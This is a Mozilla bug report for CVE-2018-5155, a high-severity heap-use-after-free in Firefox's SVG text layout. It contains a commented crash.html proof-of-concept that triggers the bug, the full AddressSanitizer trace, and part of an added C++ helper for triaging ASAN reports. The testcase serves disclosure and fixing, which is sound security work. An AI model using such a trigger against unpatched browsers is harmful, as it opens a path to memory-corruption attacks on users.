Bug 1448774 (CVE-2018-5155)

heap-use-after-free in mozilla::CharIterator::GetOriginalGlyphOffsets

VERIFIED FIXED in Firefox -esr52

Status


defect
VERIFIED FIXED
a year ago
8 months ago

People

(Reporter: nils, Assigned: longsonr)

Tracking

({csectype-uaf, sec-high})

61 Branch
mozilla61
Points:
---
Bug Flags:
sec-bounty +

Firefox Tracking Flags

(firefox-esr5260+ verified, firefox59 wontfix, firefox60+ verified, firefox61+ verified)

Details

(Whiteboard: [adv-main60+][adv-esr52.8+])

Attachments

(6 attachments, 1 obsolete attachment)

(Reporter)

Description

a year ago
Posted image svg.svg
The following testcase crashes the latest ASAN build of Firefox 61.0a1 (SourceStamp=b4aeb99d1cb601e5a5288ca05630913fa8528a1c). It requires the attached svg.svg in the same directory.

crash.html:
<script>
// Open the attached svg.svg (not reproduced on this page) in a popup; its load
// event hands us the SVG document and the two elements mutated below.
function start() {
	o100=window.open('svg.svg','p58','height=6');
	o100.onload=fun0;
	setTimeout(fun1, 400);
}
function fun0(e) {
	o101=e.target;
	o109=o101.getElementById('id1');
	o120=o101.getElementById('id8');
}
// Resize id8 and append a <style> to the SVG document that changes border
// properties on every element with a -moz-transition. The resulting CSS
// transitions are what the refresh driver ticks (CSSTransition::Tick in the
// ASAN trace); the throttling check then walks into
// SVGTextFrame::UpdateGlyphPositioning -> DoTextPathLayout.
function fun1() {
	o167=o109.ownerDocument;
	o168=document.createElement('head');
	o167.documentElement.appendChild(o168);
	o120.setAttribute('width','393216');
	o206=document.createElement('head');
	o167.documentElement.appendChild(o206);
	o207=document.createElement('style');
	o206.appendChild(o207);
	o207.textContent="*{ -moz-transition: 235ms; -moz-border-end-color: green; border-right-style: inset";
	setTimeout(fun2,240);
}
// Change the viewBox and inject an SVG fragment carrying a SMIL <set>
// animation. With a SMIL sample pending, reading an animated attribute from
// inside DoTextPathLayout (nsSVGEnum::DOMAnimatedEnum::AnimVal in the free
// stack) flushes animations, restyles, and frees the gfxTextRun that the
// CharIterator on the same stack is still walking.
function fun2() {
	o120.setAttribute('viewBox','0 0 1000 1000');
	o5=document.createElement("div");
	o5.innerHTML="<svg height='10px' xmlns='http://www.w3.org/2000/svg'><set attributeName='font-weight'><style>*{{}}*{ background-position-x: 1px";
	o168.innerHTML=o5.innerHTML;
}
</script>
<body onload="start()"></body>

ASAN output:
=================================================================
==15139==ERROR: AddressSanitizer: heap-use-after-free on address 0x612000131768 at pc 0x7fa844a5c5d0 bp 0x7ffdd01c31d0 sp 0x7ffdd01c31c8
READ of size 8 at 0x612000131768 thread T0 (file:// Content)
    #0 0x7fa844a5c5cf in IsClusterStart /builds/worker/workspace/build/src/obj-firefox/dist/include/gfxTextRun.h:113:16
    #1 0x7fa844a5c5cf in mozilla::CharIterator::GetOriginalGlyphOffsets(unsigned int&, unsigned int&) const /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:2596
    #2 0x7fa844a5c6ea in mozilla::CharIterator::GetGlyphAdvance(nsPresContext*) const /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:2618:3
    #3 0x7fa844a7bfee in SVGTextFrame::DoTextPathLayout() /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:5108:12
    #4 0x7fa844a7fdb5 in SVGTextFrame::DoGlyphPositioning() /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:5365:3
    #5 0x7fa844a82ce8 in UpdateGlyphPositioning /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:5433:5
    #6 0x7fa844a82ce8 in SVGTextFrame::TransformFrameRectFromTextChild(nsRect const&, nsIFrame*) /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:5734
    #7 0x7fa844528b3c in nsLayoutUtils::TransformFrameRectToAncestor(nsIFrame*, nsRect const&, nsIFrame const*, bool*, mozilla::Maybe<mozilla::gfx::Matrix4x4TypedFlagged<mozilla::gfx::UnknownUnits, mozilla::gfx::UnknownUnits> >*, bool, nsIFrame**) /builds/worker/workspace/build/src/layout/base/nsLayoutUtils.cpp:3139:27
    #8 0x7fa84472631a in IsFrameScrolledOutOfView(nsIFrame*, nsRect const&, nsIFrame*) /builds/worker/workspace/build/src/layout/generic/nsFrame.cpp:11026:5
    #9 0x7fa844726190 in nsIFrame::IsScrolledOutOfView() /builds/worker/workspace/build/src/layout/generic/nsFrame.cpp:11057:10
    #10 0x7fa83ef594a8 in mozilla::dom::KeyframeEffectReadOnly::CanThrottle() const /builds/worker/workspace/build/src/dom/animation/KeyframeEffectReadOnly.cpp:1172:16
    #11 0x7fa83ef345d2 in mozilla::dom::KeyframeEffectReadOnly::NotifyAnimationTimingUpdated() /builds/worker/workspace/build/src/dom/animation/KeyframeEffectReadOnly.cpp:134:7
    #12 0x7fa83ef32775 in mozilla::dom::Animation::UpdateTiming(mozilla::dom::Animation::SeekFlag, mozilla::dom::Animation::SyncNotifyFlag) /builds/worker/workspace/build/src/dom/animation/Animation.cpp:1346:3
    #13 0x7fa83ef2c0f1 in mozilla::dom::Animation::Tick() /builds/worker/workspace/build/src/dom/animation/Animation.cpp:699:3
    #14 0x7fa844382440 in mozilla::dom::CSSTransition::Tick() /builds/worker/workspace/build/src/layout/style/nsTransitionManager.cpp:337:14
    #15 0x7fa83ef44afe in mozilla::dom::DocumentTimeline::WillRefresh(mozilla::TimeStamp) /builds/worker/workspace/build/src/dom/animation/DocumentTimeline.cpp:184:16
    #16 0x7fa844396517 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1884:12
    #17 0x7fa8443a6a00 in TickDriver /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:338:13
    #18 0x7fa8443a6a00 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:308
    #19 0x7fa8443a65c6 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:330:5
    #20 0x7fa8443a933e in RunRefreshDrivers /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:771:5
    #21 0x7fa8443a933e in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:684
    #22 0x7fa8443a8f3e in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:585:9
    #23 0x7fa844c56e9f in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&) /builds/worker/workspace/build/src/layout/ipc/VsyncChild.cpp:68:16
    #24 0x7fa83d7cc550 in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:156:20
    #25 0x7fa83d6b73d4 in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:1968:28
    #26 0x7fa83d25583e in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2135:25
    #27 0x7fa83d2527c1 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2065:17
    #28 0x7fa83d253fbc in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1911:5
    #29 0x7fa83d254618 in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1944:15
    #30 0x7fa83c382568 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1096:14
    #31 0x7fa83c39e8d0 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:519:10
    #32 0x7fa83d25d396 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:125:5
    #33 0x7fa83d1b08a9 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #34 0x7fa83d1b08a9 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #35 0x7fa83d1b08a9 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #36 0x7fa843e3379a in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:157:27
    #37 0x7fa8480e478b in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:893:22
    #38 0x7fa83d1b08a9 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #39 0x7fa83d1b08a9 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #40 0x7fa83d1b08a9 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #41 0x7fa8480e416a in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:719:34
    #42 0x4f1875 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:50:30
    #43 0x4f1875 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
    #44 0x7fa85c0be82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #45 0x420f48 in _start (/fuzzer3/firefox/firefox+0x420f48)

0x612000131768 is located 40 bytes inside of 288-byte region [0x612000131740,0x612000131860)
freed by thread T0 (file:// Content) here:
    #0 0x4c1952 in __interceptor_free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:68:3
    #1 0x7fa8448e7b61 in ClearTextRuns /builds/worker/workspace/build/src/layout/generic/nsTextFrame.h:626:5
    #2 0x7fa8448e7b61 in nsTextFrame::MarkIntrinsicISizesDirty() /builds/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:8530
    #3 0x7fa8443eeb38 in mozilla::PresShell::FrameNeedsReflow(nsIFrame*, nsIPresShell::IntrinsicDirty, nsFrameState, nsIPresShell::ReflowRootHandling) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:2797:18
    #4 0x7fa84443f14d in StyleChangeReflow /builds/worker/workspace/build/src/layout/base/RestyleManager.cpp:1234:26
    #5 0x7fa84443f14d in mozilla::RestyleManager::ProcessRestyledFrames(nsStyleChangeList&) /builds/worker/workspace/build/src/layout/base/RestyleManager.cpp:1559
    #6 0x7fa84444d8f5 in mozilla::ServoRestyleManager::DoProcessPendingRestyles(mozilla::ServoTraversalFlags) /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1188:9
    #7 0x7fa844406ffd in ProcessPendingRestyles /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1264:3
    #8 0x7fa844406ffd in ProcessPendingRestyles /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RestyleManagerInlines.h:43
    #9 0x7fa844406ffd in mozilla::PresShell::DoFlushPendingNotifications(mozilla::ChangesToFlush) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:4259
    #10 0x7fa83f3e33c8 in FlushPendingNotifications /builds/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:579:5
    #11 0x7fa83f3e33c8 in nsIDocument::FlushPendingNotifications(mozilla::ChangesToFlush) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:7649
    #12 0x7fa8438218af in nsSMILAnimationController::DoSample(bool) /builds/worker/workspace/build/src/dom/smil/nsSMILAnimationController.cpp:440:15
    #13 0x7fa84337257b in Resample /builds/worker/workspace/build/src/dom/smil/nsSMILAnimationController.h:74:21
    #14 0x7fa84337257b in FlushResampleRequests /builds/worker/workspace/build/src/dom/smil/nsSMILAnimationController.h:90
    #15 0x7fa84337257b in FlushAnimations /builds/worker/workspace/build/src/dom/svg/nsSVGElement.cpp:2677
    #16 0x7fa84337257b in nsSVGEnum::DOMAnimatedEnum::AnimVal() /builds/worker/workspace/build/src/dom/svg/nsSVGEnum.h:97
    #17 0x7fa844a7bf5d in SVGTextFrame::DoTextPathLayout() /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:5099:31
    #18 0x7fa844a7fdb5 in SVGTextFrame::DoGlyphPositioning() /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:5365:3
    #19 0x7fa844a82ce8 in UpdateGlyphPositioning /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:5433:5
    #20 0x7fa844a82ce8 in SVGTextFrame::TransformFrameRectFromTextChild(nsRect const&, nsIFrame*) /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:5734
    #21 0x7fa844528b3c in nsLayoutUtils::TransformFrameRectToAncestor(nsIFrame*, nsRect const&, nsIFrame const*, bool*, mozilla::Maybe<mozilla::gfx::Matrix4x4TypedFlagged<mozilla::gfx::UnknownUnits, mozilla::gfx::UnknownUnits> >*, bool, nsIFrame**) /builds/worker/workspace/build/src/layout/base/nsLayoutUtils.cpp:3139:27
    #22 0x7fa84472631a in IsFrameScrolledOutOfView(nsIFrame*, nsRect const&, nsIFrame*) /builds/worker/workspace/build/src/layout/generic/nsFrame.cpp:11026:5
    #23 0x7fa844726190 in nsIFrame::IsScrolledOutOfView() /builds/worker/workspace/build/src/layout/generic/nsFrame.cpp:11057:10
    #24 0x7fa83ef594a8 in mozilla::dom::KeyframeEffectReadOnly::CanThrottle() const /builds/worker/workspace/build/src/dom/animation/KeyframeEffectReadOnly.cpp:1172:16
    #25 0x7fa83ef345d2 in mozilla::dom::KeyframeEffectReadOnly::NotifyAnimationTimingUpdated() /builds/worker/workspace/build/src/dom/animation/KeyframeEffectReadOnly.cpp:134:7
    #26 0x7fa83ef32775 in mozilla::dom::Animation::UpdateTiming(mozilla::dom::Animation::SeekFlag, mozilla::dom::Animation::SyncNotifyFlag) /builds/worker/workspace/build/src/dom/animation/Animation.cpp:1346:3
    #27 0x7fa83ef2c0f1 in mozilla::dom::Animation::Tick() /builds/worker/workspace/build/src/dom/animation/Animation.cpp:699:3
    #28 0x7fa844382440 in mozilla::dom::CSSTransition::Tick() /builds/worker/workspace/build/src/layout/style/nsTransitionManager.cpp:337:14
    #29 0x7fa83ef44afe in mozilla::dom::DocumentTimeline::WillRefresh(mozilla::TimeStamp) /builds/worker/workspace/build/src/dom/animation/DocumentTimeline.cpp:184:16
    #30 0x7fa844396517 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1884:12
    #31 0x7fa8443a6a00 in TickDriver /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:338:13
    #32 0x7fa8443a6a00 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:308
    #33 0x7fa8443a65c6 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:330:5
    #34 0x7fa8443a933e in RunRefreshDrivers /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:771:5
    #35 0x7fa8443a933e in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:684
    #36 0x7fa8443a8f3e in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:585:9
    #37 0x7fa844c56e9f in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&) /builds/worker/workspace/build/src/layout/ipc/VsyncChild.cpp:68:16
    #38 0x7fa83d7cc550 in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:156:20
    #39 0x7fa83d6b73d4 in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:1968:28
    #40 0x7fa83d25583e in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2135:25

previously allocated by thread T0 (file:// Content) here:
    #0 0x4c1c93 in malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:88:3
    #1 0x7fa83ec6d177 in gfxTextRun::AllocateStorageForTextRun(unsigned long, unsigned int) /builds/worker/workspace/build/src/gfx/thebes/gfxTextRun.cpp:128:21
    #2 0x7fa8448a771a in Create /builds/worker/workspace/build/src/layout/generic/nsTextRunTransformations.cpp:51:19
    #3 0x7fa8448a771a in MakeTextRun /builds/worker/workspace/build/src/layout/generic/nsTextRunTransformations.cpp:114
    #4 0x7fa8448a771a in nsTransformingTextRunFactory::MakeTextRun(unsigned char const*, unsigned int, gfxTextRunFactory::Parameters const*, gfxFontGroup*, mozilla::gfx::ShapedTextFlags, nsTextFrameUtils::Flags, nsTArray<RefPtr<nsTransformedCharStyle> >&&, bool) /builds/worker/workspace/build/src/layout/generic/nsTextRunTransformations.cpp:131
    #5 0x7fa8448a1fb7 in BuildTextRunsScanner::BuildTextRunForFrames(void*) /builds/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:2396:38
    #6 0x7fa84489b718 in BuildTextRunsScanner::FlushFrames(bool, bool) /builds/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:1699:17
    #7 0x7fa8448ac9a7 in BuildTextRuns /builds/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:1625:11
    #8 0x7fa8448ac9a7 in nsTextFrame::EnsureTextRun(nsTextFrame::TextRunType, mozilla::gfx::DrawTarget*, nsIFrame*, nsLineList_iterator const*, unsigned int*) /builds/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:2864
    #9 0x7fa8448eadac in nsTextFrame::AddInlinePrefISizeForFlow(gfxContext*, nsIFrame::InlinePrefISizeData*, nsTextFrame::TextRunType) /builds/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:8728:5
    #10 0x7fa8448ecafa in nsTextFrame::AddInlinePrefISize(gfxContext*, nsIFrame::InlinePrefISizeData*) /builds/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:8864:10
    #11 0x7fa84462c5fe in nsBlockFrame::GetPrefISize(gfxContext*) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:860:16
    #12 0x7fa844a80936 in SVGTextFrame::DoReflow() /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:5520:29
    #13 0x7fa844a67e96 in MaybeReflowAnonymousBlockChild /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:5475:5
    #14 0x7fa844a67e96 in SVGTextFrame::ReflowSVG() /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:3772
    #15 0x7fa844a68fc9 in nsSVGDisplayContainerFrame::ReflowSVG() /builds/worker/workspace/build/src/layout/svg/nsSVGContainerFrame.cpp:350:17
    #16 0x7fa844ace528 in nsSVGOuterSVGFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /builds/worker/workspace/build/src/layout/svg/nsSVGOuterSVGFrame.cpp:455:14
    #17 0x7fa844694f76 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, mozilla::WritingMode const&, mozilla::LogicalPoint const&, nsSize const&, unsigned int, nsReflowStatus&, nsOverflowContinuationTracker*) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:940:14
    #18 0x7fa8446937bd in nsCanvasFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /builds/worker/workspace/build/src/layout/generic/nsCanvasFrame.cpp:713:5
    #19 0x7fa844694f76 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, mozilla::WritingMode const&, mozilla::LogicalPoint const&, nsSize const&, unsigned int, nsReflowStatus&, nsOverflowContinuationTracker*) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:940:14
    #20 0x7fa844770818 in nsHTMLScrollFrame::ReflowScrolledFrame(mozilla::ScrollReflowInput*, bool, bool, mozilla::ReflowOutput*, bool) /builds/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:554:3
    #21 0x7fa844771c39 in nsHTMLScrollFrame::ReflowContents(mozilla::ScrollReflowInput*, mozilla::ReflowOutput const&) /builds/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:677:3
    #22 0x7fa844775c18 in nsHTMLScrollFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /builds/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:1054:3
    #23 0x7fa84461551e in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, int, int, unsigned int, nsReflowStatus&, nsOverflowContinuationTracker*) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:984:14
    #24 0x7fa844614099 in mozilla::ViewportFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /builds/worker/workspace/build/src/layout/generic/ViewportFrame.cpp:335:7
    #25 0x7fa8443f3681 in mozilla::PresShell::DoReflow(nsIFrame*, bool) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:8838:11
    #26 0x7fa8444090d0 in mozilla::PresShell::ProcessReflowCommands(bool) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:9011:24
    #27 0x7fa8444074f3 in mozilla::PresShell::DoFlushPendingNotifications(mozilla::ChangesToFlush) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:4309:11
    #28 0x7fa844396ecd in FlushPendingNotifications /builds/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:579:5
    #29 0x7fa844396ecd in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1939
    #30 0x7fa8443a1354 in nsRefreshDriver::FinishedWaitingForTransaction() /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:2163:5
    #31 0x7fa83e9422b3 in mozilla::layers::ClientLayerManager::DidComposite(unsigned long, mozilla::TimeStamp const&, mozilla::TimeStamp const&) /builds/worker/workspace/build/src/gfx/layers/client/ClientLayerManager.cpp:532:32
    #32 0x7fa8436ffd1b in mozilla::dom::TabChild::DidComposite(unsigned long, mozilla::TimeStamp const&, mozilla::TimeStamp const&) /builds/worker/workspace/build/src/dom/ipc/TabChild.cpp:3127:7
    #33 0x7fa83ea3449a in mozilla::layers::CompositorBridgeChild::RecvDidComposite(unsigned long const&, unsigned long const&, mozilla::TimeStamp const&, mozilla::TimeStamp const&) /builds/worker/workspace/build/src/gfx/layers/ipc/CompositorBridgeChild.cpp:548:14
    #34 0x7fa83d9f9e09 in mozilla::layers::PCompositorBridgeChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PCompositorBridgeChild.cpp:1401:20

SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/obj-firefox/dist/include/gfxTextRun.h:113:16 in IsClusterStart
Shadow bytes around the buggy address:
  0x0c248001e290: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c248001e2a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa
  0x0c248001e2b0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c248001e2c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c248001e2d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa
=>0x0c248001e2e0: fa fa fa fa fa fa fa fa fd fd fd fd fd[fd]fd fd
  0x0c248001e2f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c248001e300: fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa
  0x0c248001e310: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c248001e320: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c248001e330: fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==15139==ABORTING
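The report above tells the whole story once it is read as two stacks rather than one: SVGTextFrame::DoTextPathLayout is frame #3 of the use stack and frame #17 of the free stack, so the text run was freed by something DoTextPathLayout itself called (nsSVGEnum::DOMAnimatedEnum::AnimVal, which flushed SMIL animations into a restyle and nsTextFrame::ClearTextRuns). The triage helper below is added here and is not part of the bug report or of Mozilla's tooling; it parses an ASAN heap-use-after-free report and finds that shared frame automatically. The embedded report is an abbreviated excerpt of the one above with the build paths shortened, and the event-loop frame list is a starter set chosen for this example, not Firefox's actual dispatch frames.

```cpp
#include <iostream>
#include <set>
#include <sstream>
#include <string>
#include <vector>

// Abbreviated excerpt of the ASAN report in the bug (constructed for this
// example: a few frames per stack, source paths shortened to /src/...).
static const char* kReport =
"==15139==ERROR: AddressSanitizer: heap-use-after-free on address 0x612000131768\n"
"READ of size 8 at 0x612000131768 thread T0 (file:// Content)\n"
"    #0 0x7fa844a5c5cf in IsClusterStart /src/gfxTextRun.h:113:16\n"
"    #1 0x7fa844a5c5cf in mozilla::CharIterator::GetOriginalGlyphOffsets(unsigned int&, unsigned int&) const /src/SVGTextFrame.cpp:2596\n"
"    #2 0x7fa844a5c6ea in mozilla::CharIterator::GetGlyphAdvance(nsPresContext*) const /src/SVGTextFrame.cpp:2618:3\n"
"    #3 0x7fa844a7bfee in SVGTextFrame::DoTextPathLayout() /src/SVGTextFrame.cpp:5108:12\n"
"    #4 0x7fa844a7fdb5 in SVGTextFrame::DoGlyphPositioning() /src/SVGTextFrame.cpp:5365:3\n"
"\n"
"0x612000131768 is located 40 bytes inside of 288-byte region\n"
"freed by thread T0 (file:// Content) here:\n"
"    #0 0x4c1952 in __interceptor_free /src/asan_malloc_linux.cc:68:3\n"
"    #1 0x7fa8448e7b61 in ClearTextRuns /src/nsTextFrame.h:626:5\n"
"    #2 0x7fa8448e7b61 in nsTextFrame::MarkIntrinsicISizesDirty() /src/nsTextFrame.cpp:8530\n"
"    #3 0x7fa8438218af in nsSMILAnimationController::DoSample(bool) /src/nsSMILAnimationController.cpp:440:15\n"
"    #4 0x7fa84337257b in nsSVGEnum::DOMAnimatedEnum::AnimVal() /src/nsSVGEnum.h:97\n"
"    #5 0x7fa844a7bf5d in SVGTextFrame::DoTextPathLayout() /src/SVGTextFrame.cpp:5099:31\n"
"    #6 0x7fa844a7fdb5 in SVGTextFrame::DoGlyphPositioning() /src/SVGTextFrame.cpp:5365:3\n"
"\n"
"previously allocated by thread T0 (file:// Content) here:\n"
"    #0 0x4c1c93 in malloc /src/asan_malloc_linux.cc:88:3\n"
"    #1 0x7fa83ec6d177 in gfxTextRun::AllocateStorageForTextRun(unsigned long, unsigned int) /src/gfxTextRun.cpp:128:21\n"
"\n";

struct AsanReport {
    std::vector<std::string> useStack, freeStack, allocStack;  // innermost frame first
};

// "    #3 0x... in SVGTextFrame::DoTextPathLayout() /src/SVGTextFrame.cpp:5108:12"
// -> "SVGTextFrame::DoTextPathLayout" (argument list and source location dropped).
std::string FrameName(const std::string& line) {
    size_t in = line.find(" in ");
    if (in == std::string::npos) return "";
    std::string rest = line.substr(in + 4);
    size_t end = rest.find_first_of("( ");
    return end == std::string::npos ? rest : rest.substr(0, end);
}

// Splits the report into its three stacks; each stack ends at a blank line.
AsanReport ParseAsanReport(const std::string& text) {
    AsanReport r;
    std::vector<std::string>* cur = nullptr;
    std::istringstream in(text);
    std::string line;
    while (std::getline(in, line)) {
        if (line.rfind("READ of size", 0) == 0 || line.rfind("WRITE of size", 0) == 0) cur = &r.useStack;
        else if (line.rfind("freed by thread", 0) == 0) cur = &r.freeStack;
        else if (line.rfind("previously allocated by", 0) == 0) cur = &r.allocStack;
        else if (line.empty()) cur = nullptr;
        else if (cur && line.rfind("    #", 0) == 0) cur->push_back(FrameName(line));
    }
    return r;
}

// Frames at which any two stacks on one thread coincide; sharing only these
// means the free happened in an earlier event, not inside the user's callee.
// Starter list for this example: extend it for the code base being triaged.
static bool IsEventLoopFrame(const std::string& f) {
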